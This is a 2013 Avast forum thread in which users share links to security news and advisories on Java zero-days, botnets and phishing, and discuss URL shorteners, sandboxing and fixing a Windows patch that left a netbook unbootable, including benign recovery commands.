http://arstechnica.com/security/2013/02/massive-search-fraud-botnet-siezed-by-microsoft-and-symantec/?utm_source=feedburner&utm_medium=feed&utm_campaign=Feed%3A+arstechnica%2Findex+%28Ars+Technica+-+All+content%29
-
malware disguised as antivirus free
http://www.securelist.com/en/blog?weblogid=208194106
Update Kaspersky crashes and leaves owners of Windows XP without internet
http://translate.google.com.br/translate?sl=pt&tl=en&js=n&prev=_t&hl=pt-BR&ie=UTF-8&eotf=1&u=http%3A%2F%2Fwww.tecmundo.com.br%2Fantivirus%2F36433-atualizacao-do-kaspersky-trava-e-deixa-donos-de-windows-xp-sem-internet.htm
-
Microsoft Security Bulletin Advance Notification for February 2013
http://technet.microsoft.com/en-us/security/bulletin/ms13-feb
-
Latest Flash attack coming from China: http://blog.fireeye.com/research/2013/02/lady-boyle-comes-to-town-with-a-new-exploit.html (link article authors = FireEye researchers Josh Gomez, Thoufique Haq, and Yichong Lin)
polonus
-
Lots of router vulnerabilities, not many patches
http://www.h-online.com/security/news/item/Lots-of-router-vulnerabilities-not-many-patches-1800471.html
-
Updates to February 2013 Critical Patch Update for Java SE
https://blogs.oracle.com/security/entry/updates_to_february_2013_critical
-
Malvertisers infect users with browser with java plug-in: http://www.symantec.com/connect/blogs/malvertising-and-dynamic-dns-never-ending-story
(link article official Symantic blog author = John Harrison) The majority of infected sites are compromised openX ad platforms..so, hacked ad sites...
polonus
-
http://www.symantec.com/connect/blogs/cross-platform-frutas-rat-builder-and-back-door (link article author = Val S.)
only 2 will detect in VT,
polonus
-
Lots of router vulnerabilities, not many patches
http://www.h-online.com/security/news/item/Lots-of-router-vulnerabilities-not-many-patches-1800471.html
You can test your router here:
https://www.grc.com/x/ne.dll?bh0bkyd2
Click on "proceed" . Then click on the big button that says " GRC's instant UPnP exposure test". This will tell you if your router is vulnerable.
-
Hi Marc57,
Tested there and got the following results THE EQUIPMENT AT THE TARGET IP ADDRESS
DID NOT RESPOND TO OUR UPnP PROBES!
For what it is worth,
polonus
-
Hi Marc57,
Tested there and got the following results THE EQUIPMENT AT THE TARGET IP ADDRESS
DID NOT RESPOND TO OUR UPnP PROBES!
For what it is worth,
polonus
I got the same :)
-
That means it's not vulnerable.
-
Thank you, Marc57 for the heads-up on this,
Damian
-
That means it's not vulnerable.
Correct
-
Hi craigb,
Does it help I am behind SoftPerfect Wifi Guard?
polonus
-
Thank you, Marc57 for the heads-up on this,
Damian
Your Welcome. Does that run on your system or on the router.
-
Just answer this one, I do not like to go too far off-topic on what is originally CharleyO's thread. Hope he will forgive me. This Wifi Guard tool checks from the OS every 30 minutes...router, modem and comp against being compromised..
polonus
-
Thank you, Marc57 for the heads-up on this,
Damian
Your Welcome. Does that run on your system or on the router.
+1 Thank you, Marc57. Also no response here. Bookmarked this link, as unaware grc had this.
-
There are folks that ridicule Gibson as a security researcher, but I always held him in high esteem for what he reports and brought us,
polonus
-
There are folks that ridicule Gibson as a security researcher, but I always held him in high esteem for what he reports and brought us,
polonus
Actually, it may be the folksy writing style that some may not like.
He offers free tools such as UpnP, Dcombulator, etc., and could not have set up system the way it is without his help.
-
Thank you, Marc57 for the heads-up on this,
Damian
Your Welcome. Does that run on your system or on the router.
+1 Thank you, Marc57. Also no response here. Bookmarked this link, as unaware grc had this.
You're Welcome, This is something new that Steve put together in the last couple weeks.I've been a fan of Steves since I started watching Security Now several years ago.
-
Hi craigb,
Does it help I am behind SoftPerfect Wifi Guard?
polonus
As far as I know SoftPerfect Wifi Guard is only a program that detects/notifies you about new connections, it shouldn't have any effect on the test whether you have Wifi Guard or not.
-
New zero-day in Adobe Reader actively being abused: http://blog.fireeye.com/research/2013/02/in-turn-its-pdf-time.html (link article author FireEye's Yichong Lin )
polonus
-
New zero-day in Adobe Reader actively being abused: http://blog.fireeye.com/research/2013/02/in-turn-its-pdf-time.html (link article author FireEye's Yichong Lin )
Confirmed by Adobe: http://blogs.adobe.com/psirt/2013/02/adobe-reader-and-acrobat-vulnerability-report.html
-
Newest trend: malware injected in JavaScript legit websites.
http://nakedsecurity.sophos.com/2013/02/13/malware-javascript/ (link article author Paul Baccas)
polonus
-
New zero-day in Adobe Reader actively being abused: http://blog.fireeye.com/research/2013/02/in-turn-its-pdf-time.html (link article author FireEye's Yichong Lin )
polonus
Thanks P-man
-
Google faces new privacy concerns over Android app market
http://www.rawstory.com/rs/2013/02/13/google-faces-new-privacy-concerns-over-app-market/
http://phetdreams.tumblr.com/post/42959902001/massive-google-play-privacy-issue
-
New zero-day in Adobe Reader actively being abused: http://blog.fireeye.com/research/2013/02/in-turn-its-pdf-time.html (link article author FireEye's Yichong Lin )
Confirmed by Adobe: http://blogs.adobe.com/psirt/2013/02/adobe-reader-and-acrobat-vulnerability-report.html
-> http://www.adobe.com/support/security/advisories/apsa13-02.html
-
Hi Marc57,
Another nice one from Gibson: http://www.grc.com/dns/benchmark.htm
pol
-
Lots of router vulnerabilities, not many patches
http://www.h-online.com/security/news/item/Lots-of-router-vulnerabilities-not-many-patches-1800471.html
More Wi-Fi devices with security holes
http://www.h-online.com/security/news/item/More-Wi-Fi-devices-with-security-holes-1805115.html
-
USB worm recognizes VM: http://blogs.mcafee.com/mcafee-labs/polymorphic-autorun-worm-evolves-and-obfuscates (link article author - McAfee's Sanchit Karve)
polonus
-
American SSL-certificate company DigiCert issued 70 digital certificates to malcreants: http://www.welivesecurity.com/2013/02/21/code-certificate-laissez-faire-banking-trojans/ (link article author = ESET's Stephen Cobb)
polonus
-
NBC Website HACKED – Be Careful Surfing
http://blog.sucuri.net/2013/02/nbc-website-hacked-be-careful-surfing.html
-
Beware! Identity thieves are targeting your tax refund (http://www.infoworld.com/t/identity-management/beware-identity-thieves-are-targeting-your-tax-refund-212915)
"Victims often don't find out their IDs have been stolen until their legitimate returns are rejected.
Straightening out those tax records can be a significant administrative hassle -- this is the IRS,
after all. Acting IRS Commissioner Steven T. Miller said last month that taxpayers whose IDs
have been stolen often must wait months to get their rightful refunds."
-
Recent Cyberattacks [MS]
http://blogs.technet.com/b/msrc/archive/2013/02/22/recent-cyberattacks.aspx
-
Recent Cyberattacks [MS]
http://blogs.technet.com/b/msrc/archive/2013/02/22/recent-cyberattacks.aspx
You see any description of the exact method and symptoms of these attacks? Java code?
I had heard that some of the attacks were keystroke loggers planted through emails to unsuspecting employees.
-
Recent Cyberattacks [MS]
http://blogs.technet.com/b/msrc/archive/2013/02/22/recent-cyberattacks.aspx
You see any description of the exact method and symptoms of these attacks? Java code?
I had heard that some of the attacks were keystroke loggers planted through emails to unsuspecting employees.
Here is some of the NBC info:
http://malwaretips.com/Thread-NBC-com-hacked-serving-up-Citadel-malware
-
Again new Java 7 holes found, issues 54 and 55 (should be combined for a functional exploit):
http://www.security-explorations.com/en/SE-2012-01-poc.html
credits go to Adam Gowdiak
polonus
-
Again new Java 7 holes found, issues 54 and 55 (should be combined for a functional exploit):
http://www.security-explorations.com/en/SE-2012-01-poc.html
credits go to Adam Gowdiak
polonus
Also see: http://news.softpedia.com/news/Zero-Day-Vulnerability-Affecting-Java-7-Update-15-and-Earlier-Versions-Identified-332157.shtml
-
Update on the Bit9 security incident (SQL attack combined with a java exploit): https://blog.bit9.com/2013/02/25/bit9-security-incident-update/
(link article author = harry sverdlove)
polonus
-
Iran Fights Off New Attack From Enemy Hackers
http://www.redorbit.com/news/technology/1112754098/iran-fights-off-enemy-hackers-122612/
-
Sneaky Joomla Web Malware alert: http://www.viruss.eu/web-malware/sneaky-joomla-web-malware-javascript-infections/ (link article author = antivirus robot)
Cleaning up info: http://sucuri.net/cleaning-up-an-infected-joomla-web-site.html
polonus
-
Open door: Oracle's JRE, something has to change: http://www.f-secure.com/weblog/archives/00002511.html (link article author = sean)
polonus
-
Open door: Oracle's JRE, something has to change...
Couldn't agree more..!! They continue to dig their own (Java) grave...
-
YAJ0: Yet Another Java Zero-Day
http://blog.fireeye.com/research/2013/02/yaj0-yet-another-java-zero-day-2.html
-
For those concerned and our forum's qualified removers,
Added free removal tool for old school MiniDuke malcode: http://download.bitdefender.com/removal_tools/
Download link: http://download.bitdefender.com/removal_tools/MiniDuke_Removal_Unified.exe
polonus
-
EVERNOTE hacked
Security Notice: Service-wide Password Reset
http://evernote.com/corp/news/password_reset.php
-
For Mac and Windows alike: http://www.intego.com/mac-security-blog/intego-discovers-a-new-multi-platform-minecraft-password-stealer/
(link article author = Lisa Myers)
polonus
-
Pan Adam Gowdiak comes up with 5 new holes in Oracle's Java, software starts to look like the proverbial Swiss Cheese now, see: http://www.security-explorations.com/en/SE-2012-01-status.html
Oracle provides tracking numbers for Issues 56-60, claims they are still not confirmed.
polonus
-
Multi-browser heap spray attack now added to metasploit: https://www.corelan.be/index.php/2013/02/19/deps-precise-heap-spray-on-firefox-and-ie10/
(link article author = Peter Van Eeckhoutte, security researcher)
polonus
-
Already dangerous to keep this in production - PHP version 5.2.17
Read: http://forums.cpanel.net/f185/already-dangerous-keeping-php-5-2-17-production-267442.html
link thread poster = kevin levin
Webmasters should always update and upgrade....
polonus
-
Targeted attack dismantled just in time: http://blog.seculert.com/2013/03/the-chinese-time-bomb.html (blog article poster = seculart)
polonus
-
Microsoft Security Bulletin Advance Notification for March 2013
http://technet.microsoft.com/en-us/security/bulletin/ms13-mar
-
Kelihos Botnet Stronger as Ever after vain attempt to bring it down, analysis: http://www.lavasoft.com/mylavasoft/malware-descriptions/blog/kelihos-botnet-gains-strength-again-0 (link article author = alexander adamov) See this on one of the encrypted IPs: http://urlquery.net/report.php?id=1028057
with ET CURRENT_EVENTS Suspicious double HTTP Header possible botnet CnC see: http://doc.emergingthreats.net/bin/view/Main/2012707
and ET INFO EXE Download With Content Type Specified As Empty -> http://comments.gmane.org/gmane.comp.security.ids.snort.emerging-sigs/15732 (link posting author - Will Metcalf) another example: http://urlquery.net/report.php?id=1305759 See how this IP could not be verified: http://dnsbl.inps.de/query.cgi?lang=en&action=check&ip=62.84.252.23&quick=0 and here this would not resolve: 404report.projecthoneypot.org/ip_62.84.252.23
but listed as a zombie here: http://support.clean-mx.de/clean-mx/publog.php?as=AS35362
62.84.252.23 | SD Bad Event 67 2013-01-03 2013-01-18 Spam Server Dictionary Attacker. So an endless task to get these sinkholed. And then another division of zombies comes into play...rather interesting info here: http://pastebin.com/NfA4pvpg linked to http://www.fireeye.com/blog/files/cagremub.ru_ips and consider info here: https://github.com/CybOXProject/Tools/blob/master/scripts/snort_to_cybox/example/botnet-cnc.rules (Github info)
polonus
-
Threat: localStorage bug allows sites to fill up hard disk
Browser makers should be aware of HTML-5 hardware bomb: -http://feross.org/fill-disk/ (link article author = Feross Aboukhadijeh )
Firefox not vulnerable...Chrome might crash totally before the HD is full...
polonus
-
US-CERT warns of HP LaserJet printer backdoor
http://www.h-online.com/security/news/item/US-CERT-warns-of-HP-LaserJet-printer-backdoor-1821334.html
-
Microsoft changes default Flash behavior in Windows 8 and RT (http://www.zdnet.com/microsoft-changes-default-flash-behavior-in-windows-8-and-rt-7000012418/?s_cid=e589)
"Summary: In a surprise reversal, Microsoft has changed the default behavior of Flash content on websites
viewed using Internet Explorer in Windows 8 or Windows RT. Previously, sites had to be on a whitelist before Flash would work.
The new behavior effectively turns the Compatibility View list into an exclusive blacklist of badly behaved sites."
-
Posting an up-to-date (March 15, 2013) listing of security vulnerabilities from Symantec Security Focus: http://www.securityfocus.com/ (http://www.securityfocus.com/)
Most have to do with Adobe and Java; just updated Adobe Flash to the latest version only two days ago.
-
Bootloader threat: http://www.welivesecurity.com/2013/03/13/how-theola-malware-uses-a-chrome-plugin-for-banking-fraud/
(link article author = Aleksandr Matrosov) See: https://www.virustotal.com/nl/file/c874509c80dbacf92fde4f18f05fb19d625e2d5eea3bf0db7e2ca37e25048174/analysis/ avast detects!
polonus
-
Third-Party Applications to Blame for 87 Percent of Vulnerabilities Last Year
http://www.majorgeeks.com/story.php?id=38077
-
Ramnit Malware Back and Better at Avoiding Detection (https://threatpost.com/en_us/blogs/ramnit-malware-back-and-better-avoiding-detection-031513)
"This time around, Ramnit has grown up with its latest iteration boasting four new upgrades,
all bolstered by rootkit functionality that hides other components of the Ramnit from security software."
-
Huawei 3G/4G USB sticks put users' security at risk
http://www.h-online.com/security/news/item/Huawei-3G-4G-USB-sticks-put-users-security-at-risk-1823894.html
-
40.000.000 users at risk from hole in EA Origin: http://revuln.com/files/ReVuln_EA_Origin_Insecurity.pdf (link article authors = Luigi Auriemma & Donato Ferrante)
pol
-
40.000.000 users at risk from hole in EA Origin: http://revuln.com/files/ReVuln_EA_Origin_Insecurity.pdf (link article authors = Luigi Auriemma & Donato Ferrante)
pol
I wasn't at risk last night because I was playing Battlefield 3 off-line just me and my bloody super lappy ;)
-
Discovered botnet steals 6.000.000 dollar from websites through click fraud: http://www.spider.io/blog/2013/03/chameleon-botnet/ (link article source = spider.io Worst offenders in this botnet are listed in this blacklist here: http://www.spider.io/wp-content/uploads/2013/03/ChameleonIPs.txt
polonus
-
40.000.000 users at risk from hole in EA Origin: http://revuln.com/files/ReVuln_EA_Origin_Insecurity.pdf (link article authors = Luigi Auriemma & Donato Ferrante)
pol
just remember STEAM has similar/same vulnerability, this brings the number of vulnerable gamers to over 100 millions
http://revuln.com/files/ReVuln_Steam_Browser_Protocol_Insecurity.pdf
-
Latest mailcious iFrames reported and malicious redirects reported and shared by eVulnLabs: http://evuln.com/labs/
polonus
-
Malcreants like to use anonymity via anonymous proxies (hacked PCs), read http://blog.webroot.com/2013/03/20/hacked-pcs-as-anonymization-stepping-stones-service-operates-in-the-open-since-2004/ (link article author = Dancho Danchev) Example of such proxies: -http://www.proxybridge.com/anonymous-proxy/ (serviced by Dutch Leaseweb)
polonus
-
Sad news, but true - One in twenty home PCs are malware infested:
http://eugene.kaspersky.com/2013/03/25/one-in-twenty-is-the-sad-truth/ (link article author = eugene kaspersky)
these results are based on 25.000 scans via Kaspersky's free scanner: http://www.kaspersky.com/security-scan
Even PCs with an av-solution installed were also infested with malware...
polonus
-
Sad news, but true - One in twenty home PCs are malware infested:
http://eugene.kaspersky.com/2013/03/25/one-in-twenty-is-the-sad-truth/ (http://eugene.kaspersky.com/2013/03/25/one-in-twenty-is-the-sad-truth/) (link article author = eugene kaspersky)
these results are based on 25.000 scans via Kaspersky's free scanner: http://www.kaspersky.com/security-scan (http://www.kaspersky.com/security-scan)
Even PCs with an av-solution installed were also infested with malware...
polonus
Since no AV is 100% effective, I venture to say that some of those infected computers are protected by Kaspersky. ;D
-
Hi bob3160,
That could even be a natural fact. You know why this info - statistical propaganda to promote your product, but the numbers are not encouraging.
Conclusion even more users have to make the switch to avast!
polonus
-
Conclusion even more users have to make the switch to avast!
polonus
That's why Bob the Builder is doing a bloody great job by getting more and more people to trust Avast, so who else is going to the job like Bob the Builder and who you're gunna trust?..........Avast or somebody else ;)
-
Hi SpeedyPC,
You know my position - avast! is a "darned" good product and it is getting better every day...
and well bob3160 seems to have converted quite a contingent of fine users in the States to make that final switch to the avast! av solution..
pol
-
Are zero days taken seriously? Re: http://www.zerodayinitiative.com/advisories/upcoming/ (reported by DVLabs)
The end of upcoming Java zero days is not in sight...
polonus
-
Are zero days taken seriously? Re: http://www.zerodayinitiative.com/advisories/upcoming/ (http://www.zerodayinitiative.com/advisories/upcoming/) (reported by DVLabs)
The end of upcoming Java zero days is not in sight...
polonus
Zero Day is another reason why in my opinion, the new feature in avast! to keep your program up-to date
is a good idea. If used properly, new updates which patched a recent exploit will get updated on the users
computer. Even in the free version of avast!
-
Are zero days taken seriously? Re: http://www.zerodayinitiative.com/advisories/upcoming/ (reported by DVLabs)
The end of upcoming Java zero days is not in sight...
polonus
Sandbox will be an answer, wouldn't it?
-
Hi Tech,
Good suggestion i.m.h.o.,
pol
-
Are zero days taken seriously? Re: http://www.zerodayinitiative.com/advisories/upcoming/ (reported by DVLabs)
The end of upcoming Java zero days is not in sight...
polonus
Sandbox will be an answer, wouldn't it?
Absolutely correct. Any malware downloaded to your system will remain inside the sandbox where it can do no harm. Once the sandbox is deleted, all contents within vanish, and the threat(s) is/are removed. Some malware will not run within a sandbox if it detects it is inside one, so one will get additional protection from that as well.
Tracking cookies vanish too when the sandbox is deleted.
If java jre is not needed, best to uninstall it from your system.
-
If java jre is not needed, best to uninstall it from your system.
We need it for online banking in my country :'(
-
If java jre is not needed, best to uninstall it from your system.
We need it for online banking in my country :'(
**Sigh**
Problem is, most users of computer systems are not advanced/expert users and thus not really aware of the dangers of using such sites. Until Oracle fixes all zero-days, or introduces a new cross-platform jre variant specifically for banker use, then the task of maintaining one's own IT support can be daunting at best, and victimize innocent users at worst. Convenience does not outweigh security in this case.
-
@Tech,
At least you could always update to the latest java version. Pre-scan links where you wanna go to avoid java based exploits (kits) landing sites.
Use NoScript and RequestPolicy extensions in the firefox browser to prevent malscripts from running and third party requests being met.
Have the avast shields up and running. Only enable java in the browser when you need it, else do not allow it...
polonus
-
If java jre is not needed, best to uninstall it from your system.
We need it for online banking in my country :'(
Me too Tech :'( :'( you're not alone buddy and you still have to keep an eye out what you're doing with online banking so you don't get robbed :o
-
(http://www9.pcmag.com/media/images/379783-sand-castle-400.jpg?thumb=y)
Boring Malware Sneaks By Antivirus Sandboxing (http://securitywatch.pcmag.com/security/309602-boring-malware-sneaks-by-antivirus-sandboxing)
-
Very hot phishing attack on Facebook users originally posted by Carol @ c|net Spyware, viruses, & security forum: NEWS - March 26, 2013.
Direct link to article report: http://www.scambook.com/blog/2013/03/facebook-security-alert-www-wasvideo-com-hacks-your-account-spams-your-friends/ (http://www.scambook.com/blog/2013/03/facebook-security-alert-www-wasvideo-com-hacks-your-account-spams-your-friends/)
Urlquery report: http://urlquery.net/report.php?id=1653452 (http://urlquery.net/report.php?id=1653452) Note the source origination point and screenshot of website. Screenshot of website is identical to the https Facebook version.
Urlvoid report: http://www.urlvoid.com/scan/fizikubook.com/ (http://www.urlvoid.com/scan/fizikubook.com/)
Sucuri report: http://sitecheck.sucuri.net/results/www.fizikubook.com/indexv2.php (http://sitecheck.sucuri.net/results/www.fizikubook.com/indexv2.php)
VirusTotal url scan report: https://www.virustotal.com/en/url/cb2a916e6d5f226ce65a22e56266248d8fe03592c104d11c83caefe784cbc49b/analysis/1364462131/ (https://www.virustotal.com/en/url/cb2a916e6d5f226ce65a22e56266248d8fe03592c104d11c83caefe784cbc49b/analysis/1364462131/)
zulu zscaler report: Not available as this site is currently number 45 in queue.
Firefox does block this site as a reported web forgery.
Under no circumstance visit this hxxp://www.fizubook.com directly.
-
Let us hope malcreants do not find out about this spamming technique abuse of Google services in combination with an URL/shortener....
: https://www.barracuda.com//blogs/labsblog?bid=3130 )article author ° Dave Michmerhuizen'
Do not use them, check links to click (for security reasons) Give in shortened links at a url-expander like
http://longurl.org/ or http://www.clybs.com/urlexpander
polonus
-
Let us hope malcreants do not find out about this spamming technique abuse of Google services in combination with an URL/shortener....
: https://www.barracuda.com//blogs/labsblog?bid=3130 (https://www.barracuda.com//blogs/labsblog?bid=3130) )article author ° Dave Michmerhuizen'
Do not use them, check links to click (for security reasons) Give in shortened links at a url-expander like
http://longurl.org/ (http://longurl.org/) or http://www.clybs.com/urlexpander (http://www.clybs.com/urlexpander)
polonus
This doesn't have anything to do with URL shortening but links embedded in translated websites. :)
I use https://goo.gl a lot of times.
Here is just one of them:
http://goo.gl/VLXde (http://goo.gl/VLXde)
Certainly not dangerous. :)
-
@ Bob
What is dangerous is the fact that the user has no way of identifying where the link leads to without clicking on the link. So there is an element of blind trust when using URL shortening methods.
I already use Long URL Mobile Expander add-on in FF, but it doesn't cover all or goo.gl being one such instance.
@ polonus
The 2nd link urlexpander, isn't as convenient as the Long URL Mobile Expander add-on as it appears to be on-line only - there is also a problem on the site any shortened url entered results in an application error. So not very good.
-
@ Bob
What is dangerous is the fact that the user has no way of identifying where the link leads to without clicking on the link. So there is an element of blind trust when using URL shortening methods.
I already use Long URL Mobile Expander add-on in FF, but it doesn't cover all or goo.gl being one such instance.
@ polonus
The 2nd link urlexpander, isn't as convenient as the Long URL Mobile Expander add-on as it appears to be on-line only - there is also a problem on the site any shortened url entered results in an application error. So not very good.
Google also checks the links it shortens for possible infections. :) One of the reasons I use their service and not any of the others.
More information available at:
http://support.google.com/websearch/bin/answer.py?hl=en&answer=190768 (http://support.google.com/websearch/bin/answer.py?hl=en&answer=190768)
-
I just don't trust what I can't make an informed decision about and as for google checking the content, google searches, in particular image searches are rife with malware redirections (lots of instances seen in the forums). So excuse me if I don't trust google when it comes to cleaning their house.
-
I just don't trust what I can't make an informed decision about and as for google checking the content, google searches, in particular image searches are rife with malware redirections (lots of instances seen in the forums). So excuse me if I don't trust google when it comes to cleaning their house.
I don't pass along other peoples shortened link but, it's certainly easier to post the following:
http://goo.gl/VLXde (http://goo.gl/VLXde)
Instead of:
https://docs.google.com/document/d/1TCCX0R7AAF2WOxAMQ_kcun2nNnCPFAk2P4RBzFXSgds/edit (https://docs.google.com/document/d/1TCCX0R7AAF2WOxAMQ_kcun2nNnCPFAk2P4RBzFXSgds/edit)
Since I know these are safe, the short link makes it easier for everyone.
Yes, you need to have some trust in the person who is passing this shortened link to you. :)
-
Yes its shorter, but so is A Google link (https://docs.google.com/document/d/1TCCX0R7AAF2WOxAMQ_kcun2nNnCPFAk2P4RBzFXSgds/edit) and from that you can hover over the link and see where it leads.
-
And what if you're using a mobile device? One cannot hover over the link, so would the average user know the difference between the two?
People of my age group tend to disregard the url completely, possibly because there are no "preview urls" featured in mobile devices.
~!Donovan
-
@DavidR,
Thanks for the additional info and the good advice. On Google Chrome browser I use Long URL extension: https://chrome.google.com/webstore/detail/longurl/oldnehmjgfcannmkgkojafngdkhfkdpd
LongURL will replace shortened links using LongURL API This works fine for me,
@! Donovan, would use this also in your case as an apps: https://play.google.com/store/apps/details?id=com.tseng.longurlexp&hl=nl
pol
-
So conclusion here is to always use an expander for short URLs both on conventional comps and smartphones,
pol
-
Hi malware sites that should fill the DNS sinkhole: http://www.malware-domains.com/
All files located here: http://www.malware-domains.com/files/
polonus
-
At least folks, do you hold these "immortals" blocked?
Immortals are long oustanding malware launching domains,
domains with a long lasting and continued history of spreading malcode,
or with the so-called "Long OVERDUE status".
An IDS list for them can be found here: http://www.autoshun.org/downloads/immortal_bhdns.rules
Or download the immortal_domains file from here: http://www.malware-domains.com/files/immortal_domains.zip
enjoy,
polonus
-
IP/hex/q.php hacks -> http://arstechnica.com/security/2013/04/exclusive-ongoing-malware-attack-targeting-apache-hijacks-20000-sites/?utm_source=feedburner&utm_medium=feed&utm_campaign=Feed%3A+arstechnica%2Ftechnology-lab+(Ars+Technica%3A+Technology+Lab)
Link article author: Aurich Lawson / Thinkstock
From the PHP manual to understand the attack better: http://php.net/manual/en/function.ip2long.php
The initial way the hack was performed is as yet not quite clear....
polonus
-
Microsoft Security Bulletin Advance Notification for April 2013
http://technet.microsoft.com/en-us/security/bulletin/ms13-apr
-
Nasty Trojan infects 100 hosts in sixty minutes
http://news.drweb.com/show/?i=3437&lng=en&c=14
http://vms.drweb.com/virus/?i=2019633
Win32:Kryptik-LFQ [Trj] - Avast users are protected
http://r.virscan.org/f95b06ee9a21bee660538ebcbdefcc53
http://r.virscan.org/12d2b7dce9809d51345920cb3d6c205e
-
Banking Trojan Carberp: An Epitaph?
https://blog.avast.com/2013/04/08/carberp_epitaph/
-
KB2839011 Released to Address Security Bulletin Update Issue
http://blogs.technet.com/b/msrc/archive/2013/04/11/kb2839011-released-to-address-security-bulletin-update-issue.aspx
http://support.microsoft.com/kb/2839011
-
KB2839011 Released to Address Security Bulletin Update Issue
http://blogs.technet.com/b/msrc/archive/2013/04/11/kb2839011-released-to-address-security-bulletin-update-issue.aspx
http://support.microsoft.com/kb/2839011
There are some reports that TrendMicro is also affected by this security update issue.
-
KB2839011 Released to Address Security Bulletin Update Issue
http://blogs.technet.com/b/msrc/archive/2013/04/11/kb2839011-released-to-address-security-bulletin-update-issue.aspx (http://blogs.technet.com/b/msrc/archive/2013/04/11/kb2839011-released-to-address-security-bulletin-update-issue.aspx)
http://support.microsoft.com/kb/2839011 (http://support.microsoft.com/kb/2839011)
There are some reports that TrendMicro is also affected by this security update issue.
I wonder if there is any correlation between this update and the problem some of the avast! customers have had ???
-
You may be onto something here Bob as the last driver loaded is the Avast one and after that it just stops
-
Microsoft pulls Patch Tuesday security fix – (http://www.zdnet.com/microsoft-pulls-patch-tuesday-security-fix-7000013942/)
Microsoft recommends that users uninstall the patch, and warns that another issue with the security update may cause anti-virus programs cease to work correctly.
The Redmond giant says that Kaspersky Anti-Virus for Windows Workstations and Kaspersky Anti-Virus for Windows Servers versions 6.0.4.1424 and 6.0.4.1611
may display an error message stating that licenses for the products are not valid, and so the software will cease to function.
The question still remains:
Has this also affected the avast! users that have flooded the forum with problems since this MS update ???
Are those problems an avast! problem or, a problem caused by MS and Avast is getting the blame as did Kaspersky ???
-
Hi bob3160,
Excellent find,
polonus
-
I'm going to need this as it looks like it has bricked my win7 netbook, not boot just black screen. Now the right royal pain in the rear starts. With no optical drive, I have to investigate bootable USB to see if I can get in and remove it.
-
Bootable USB .. That must be my department David... To install the recovery console, no need for FRST just use the recovery console ISO to get you to the command prompt
Download the following three programmes to your desktop :
1. Rufus (http://rufus.akeo.ie/downloads/rufus_v1.3.2.exe)
For 64bit systems
2. Windows 8 64bit RC (https://dl.dropbox.com/u/73555776/64win8RC.iso)
2. Windows Vista 64bit RC (https://dl.dropbox.com/u/73555776/Vista%2064bit%20rc.iso)
2. Windows 7 64bit RC (https://dl.dropbox.com/u/73555776/win7%2064bit%20rc.iso)
3. Farbar Recovery Scan Tool x64 (http://download.bleepingcomputer.com/farbar/FRST64.exe)
For 32bit systems
2. Windows Vista RC (https://dl.dropbox.com/u/73555776/vista32%20rc.iso)
2. Windows 7 RC (https://dl.dropbox.com/u/73555776/win7-32bit%20rc.iso)
3. Farbar Recovery Scan Tool (http://download.bleepingcomputer.com/farbar/FRST.exe)
Insert the USB stick Then run Rufus
(https://dl.dropbox.com/u/73555776/rufus.JPG)
Select the ISO file on the desktop via the ISO icon.
Press Start Burn
(https://dl.dropbox.com/u/73555776/RufusISO.JPG)
Then copy FRST to the same USB
(http://dl.dropbox.com/u/73555776/frstwintoboot.JPG)
Insert the USB into the sick computer and start the computer. First ensuring that the system is set to boot from USB
Note: If you are not sure how to do that follow the instructions Here (http://lifehacker.com/5991848/how-to-boot-from-a-cd-or-usb-drive-on-any-pc)
When you reboot you will see this although yours will say windows 7.
Click repair my computer
(http://i1224.photobucket.com/albums/ee362/Essexboy3/RepairVista_7275.jpg)
Select your operating system
(http://i1224.photobucket.com/albums/ee362/Essexboy3/RepairVista_7277202.jpg)
Select Command prompt
(http://i1224.photobucket.com/albums/ee362/Essexboy3/RepairVista_7277.jpg)
At the command prompt type the following :
dism /image:C:\ /get-packages
Then follow the MS details
-
Do these have to be on the desktop, to be used ?
-
Yes download on another system to create the bootable USB
Then boot the recalcitrant computer with the USB
-
Wonder if this helps David:
"Pray tell, how do you uninstall a patch that keeps Windows from starting up?"
Answer:
Uninstall:
wusa.exe /uninstall /kb:2823324 /quiet /norestart
If you can get to Safe mode,
Restart by using the F8 key.Select Repair your Computer. Select a restore point prior to the update.
-
Yes download on another system to create the bootable USB
Then boot the recalcitrant computer with the USB
Sorry by desktop, I wasn't saying my desktop PC, but the physical desktop location, I save all downloads to a specific folder.
My question was poorly framed, can I run them from any location, if I save them to my downloads folder rather than the desktop (I presume this would be correct) ?
Just been toying with booting my netbook and I can't intercept the boot to go into safe mode (F8) - also tried F12 for "Press F12 to Choose Boot Device" - also tried pecking away at the DEL key and none of those got any sort of response, so this may well be something other than this KB issue.
Hard to tell if the drive is actually spinning (I can hear the fan running, which would mask the drive activity), but no drive light activity. Perhaps this could be a coincidental hard drive failure ?
- Acer Aspire One, Win7 Starter (32bit), 2GB DDR3 RAM, Intel Atom N255 (1.5GHz dual core) CPU.
@ Bob
Yes I say that in the comments in the link you gave, but it goes further later that that can't be used in isolation like that.
Whoops...
Should have read your question better....
Restart by using the F8 key.
Select Repair your Computer.
Select the language, and then log on to the computer.
Note If you do not know the local password, you must start by using a Windows 7 DVD or USB bootable media. Then, access System Recovery Options.
Select System Restore from the menu:
You'd then restore to a date before the patches that were installed on Tuesday.
Plus this may be moot if this is a hard drive failure.
-
David,
can you boot your netbook into regular mode ???
If you can, then you can always start msconfig from the run command and from there select to reboot into safe mode.
-
No, as I mentioned it is just a black screen.
This is growing and way off topic here, so it may be best if I start a new topic.
EDIT: New Topic, http://forum.avast.com/index.php?topic=121216.0 (http://forum.avast.com/index.php?topic=121216.0).
-
http://nakedsecurity.sophos.com/2013/04/17/malware-boston-marathon-bombing/
-
There really is nothing new here, whatever the major topic in the news is these leaches come crawling out from under their rock to take advantage.
-
http://nakedsecurity.sophos.com/2013/04/17/malware-boston-marathon-bombing/
Topic back on track, and thanks for sharing. As DavidR says, this is normal behavior for spammers and malware writers seeking to exploit the naive users and newbies.
-
Oracle Critical Patch Update Advisory - April 2013
http://www.oracle.com/technetwork/topics/security/cpuapr2013-1899555.html
-
The Bearer of BadNews
https://blog.lookout.com/blog/2013/04/19/the-bearer-of-badnews-malware-google-play/
-
Flawed Malwarebytes security update wipes out thousands of computers
http://www.theinquirer.net/inquirer/news/2262248/flawed-malwarebytes-security-update-wipes-out-thousands-of-computers
-
Malware On Mobile Grew 163% In 2012, Infecting Around 32.8M Android Devices, Report Says
http://techcrunch.com/2013/04/15/malware-on-mobile-grew-163-in-2012-infecting-around-32-8m-android-devices-report-says/
-
Just after the monster patch cycle another gaping java hole detected by Gowdiak:
http://archives.neohapsis.com/archives/fulldisclosure/2013-04/0282.html
http://www.security-explorations.com/en/SE-2012-01-status.html (nr. 61 there)
